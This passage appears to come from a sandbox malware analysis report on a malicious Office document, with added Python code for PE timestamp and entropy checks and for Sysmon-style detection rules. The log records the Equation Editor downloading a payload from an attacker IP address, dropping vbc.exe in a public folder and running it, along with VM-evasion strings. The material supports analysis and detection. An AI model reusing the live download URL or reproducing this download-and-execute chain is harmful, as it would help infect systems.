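    """Compare the recorded link time with the date the sample was first observed."""
    if stamp == 0:
        return "zero"  # stripped by the linker (reproducible builds) or by a packer
    built = UNIX_EPOCH + timedelta(seconds=stamp)
    observed = datetime.fromisoformat(observed_iso)
    if built > observed + timedelta(days=tolerance_days):
        return "future"  # cannot be genuine: forged, or overwritten by a builder/crypter
    return "plausible"


def shannon_entropy(data: bytes) -> float:
    """Bits per byte, 0.0 for constant data up to 8.0 for uniformly distributed bytes."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def entropy_verdict(section: bytes) -> str:
    return "packed-or-encrypted" if shannon_entropy(section) > PACKED_ENTROPY_THRESHOLD else "normal"


def build_sample_header(stamp: int) -> bytes:
    """Constructed minimal MZ/PE stub carrying only the fields read above (not the real vbc.exe)."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)  # e_lfanew: COFF header starts at offset 0x40
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x014C, 1, stamp, 0, 0, 0xE0, 0x0102)
    return bytes(dos) + coff


if __name__ == "__main__":
    stub = build_sample_header(0xBA9E5D5F)
    ts = read_pe_timestamp(stub)
    print(hex(ts), pe_timestamp_iso(ts), timestamp_verdict(ts, "2022-08-01T00:00:00+00:00"))
    print(entropy_verdict(bytes(range(256)) * 4), entropy_verdict(b"\x00" * 4096))
```

For a real file pass the whole image to read_pe_timestamp and each section's raw bytes (SizeOfRawData from the section table) to entropy_verdict; .NET assemblies such as the dropped vbc.exe keep most of their code in .text, so a value near 8 there indicates an encrypted or compressed payload rather than ordinary CIL.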

Persistence and Installation Behavior


Source: settings.xml.rels Extracted files from sample: http://198.23.207.54/shp/doc_200.doc
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\vbc[1].exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 9_2_036406B9 URLDownloadToFileW,ShellExecuteW,ExitProcess, 9_2_036406B9
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
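The chain recorded in this section and in the process list above (EQNEDT32.EXE calling URLDownloadToFileW and ShellExecuteW, writing C:\Users\Public\vbc.exe, starting it, and vbc.exe re-spawning itself) is what an endpoint detection should catch, independent of the payload. The following detection logic is an added example, not part of the Joe Sandbox report: it evaluates Sysmon-style ProcessCreate, FileCreate and NetworkConnect events against a few rules and runs them over constructed telemetry modelled on the report's events. The rule names and field names are mine; the parent of EQNEDT32.EXE is listed as unknown in the report and is assumed to be svchost.exe (COM activation) here.

```python
from typing import Dict, List, Tuple

Event = Dict[str, str]

OFFICE_IMAGES = {"winword.exe", "excel.exe", "powerpnt.exe", "eqnedt32.exe"}
# Directories an unprivileged user, and therefore exploit shellcode, can write to
USER_WRITABLE_DIRS = (
    "c:\\users\\public\\",
    "\\appdata\\local\\temp\\",
    "\\appdata\\roaming\\",
    "\\programdata\\",
)


def _name(path: str) -> str:
    """Lower-cased file name component of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def _user_writable(path: str) -> bool:
    return any(d in path for d in USER_WRITABLE_DIRS)


def evaluate(event: Event) -> List[str]:
    """Return the rule names one event trips; an empty list means nothing to report."""
    hits: List[str] = []
    kind = event.get("EventType", "")
    image = event.get("Image", "").lower()
    parent = event.get("ParentImage", "").lower()
    if kind == "ProcessCreate":
        if _name(parent) == "eqnedt32.exe":
            hits.append("EQNEDT32_SPAWNS_PROCESS")  # Equation Editor has no legitimate child processes
        if _name(parent) in OFFICE_IMAGES and _user_writable(image):
            hits.append("OFFICE_CHILD_IN_USER_WRITABLE_DIR")
        if image == parent and _user_writable(image):
            hits.append("SELF_RESPAWN_FROM_USER_WRITABLE_DIR")  # loader re-executing itself
    elif kind == "FileCreate":
        target = event.get("TargetFilename", "").lower()
        if _name(image) == "eqnedt32.exe" and target.endswith((".exe", ".dll", ".scr")):
            hits.append("EQNEDT32_WRITES_EXECUTABLE")
    elif kind == "NetworkConnect":
        if _name(image) == "eqnedt32.exe":
            hits.append("EQNEDT32_NETWORK_CONNECTION")  # the downloader stage of the exploit
    return hits


def run(events: List[Event]) -> List[Tuple[int, List[str]]]:
    """(event index, rule hits) for every event that trips at least one rule."""
    out: List[Tuple[int, List[str]]] = []
    for idx, ev in enumerate(events):
        hits = evaluate(ev)
        if hits:
            out.append((idx, hits))
    return out


EQNEDT32 = "C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE"
WINWORD = "C:\\Program Files\\Microsoft Office\\Office14\\WINWORD.EXE"
VBC = "C:\\Users\\Public\\vbc.exe"

# Constructed telemetry modelled on the report's process and file events, not captured from the sandbox.
SAMPLE_EVENTS: List[Event] = [
    {"EventType": "ProcessCreate", "ParentImage": "C:\\Windows\\explorer.exe", "Image": WINWORD},
    # assumed parent: the report lists it as unknown
    {"EventType": "ProcessCreate", "ParentImage": "C:\\Windows\\System32\\svchost.exe", "Image": EQNEDT32},
    {"EventType": "NetworkConnect", "Image": EQNEDT32, "DestinationIp": "198.23.207.54", "DestinationPort": "80"},
    {"EventType": "FileCreate", "Image": EQNEDT32, "TargetFilename": VBC},
    {"EventType": "ProcessCreate", "ParentImage": EQNEDT32, "Image": VBC},
    {"EventType": "ProcessCreate", "ParentImage": VBC, "Image": VBC},
]

if __name__ == "__main__":
    for idx, hits in run(SAMPLE_EVENTS):
        print(idx, SAMPLE_EVENTS[idx]["EventType"], ", ".join(hits))
```

The first two events (Explorer starting Word, and the Equation Editor being activated) produce no hits, which is the point: the server-side logic should stay quiet on a user opening a document and fire only once EQNEDT32.EXE touches the network, writes a PE, or gains a child.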

Boot Survival

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion

Source: Yara match File source: 0000000A.00000002.967107263.0000000002446000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.966356766.00000000021F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: vbc.exe PID: 2192, type: MEMORYSTR
Source: vbc.exe, 0000000A.00000002.967107263.0000000002446000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000A.00000002.966356766.00000000021F1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SBIEDLL.DLL
Source: vbc.exe, 0000000A.00000002.967107263.0000000002446000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000A.00000002.966356766.00000000021F1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 1696 Thread sleep time: -240000s >= -30000s Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 2632 Thread sleep time: -45877s >= -30000s Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 2484 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\Public\vbc.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\Public\vbc.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\Public\vbc.exe Thread delayed: delay time: 45877 Jump to behavior
Source: C:\Users\Public\vbc.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: vbc.exe, 0000000A.00000002.966356766.00000000021F1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: vbc.exe, 0000000A.00000002.966356766.00000000021F1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmware
Source: EQNEDT32.EXE, 00000009.00000002.942076557.000000000098F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: vbc.exe, 0000000A.00000002.966356766.00000000021F1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMware SVGA II
Source: vbc.exe, 0000000A.00000002.966356766.00000000021F1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
Source: C:\Users\Public\vbc.exe Process token adjusted: Debug Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 9_2_03640713 mov edx, dword ptr fs:[00000030h] 9_2_03640713
Source: C:\Users\Public\vbc.exe Memory allocated: page read and write | page guard Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe" Jump to behavior
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe Jump to behavior
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe Jump to behavior
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe Jump to behavior
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe Jump to behavior
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe Jump to behavior
Source: C:\Users\Public\vbc.exe Queries volume information: C:\Users\Public\vbc.exe VolumeInformation Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information

Source: Yara match File source: Process Memory Space: vbc.exe PID: 2192, type: MEMORYSTR
Source: Yara match File source: 10.2.vbc.exe.331cbe8.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.vbc.exe.32e69c8.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.vbc.exe.331cbe8.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.vbc.exe.32ae9a8.11.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.vbc.exe.32e69c8.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000A.00000002.967422759.00000000032AE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: vbc.exe PID: 2192, type: MEMORYSTR

Remote Access Functionality

Source: Yara match File source: Process Memory Space: vbc.exe PID: 2192, type: MEMORYSTR
Source: Yara match File source: 10.2.vbc.exe.331cbe8.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.vbc.exe.32e69c8.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.vbc.exe.331cbe8.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.vbc.exe.32ae9a8.11.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.vbc.exe.32e69c8.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000A.00000002.967422759.00000000032AE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: vbc.exe PID: 2192, type: MEMORYSTR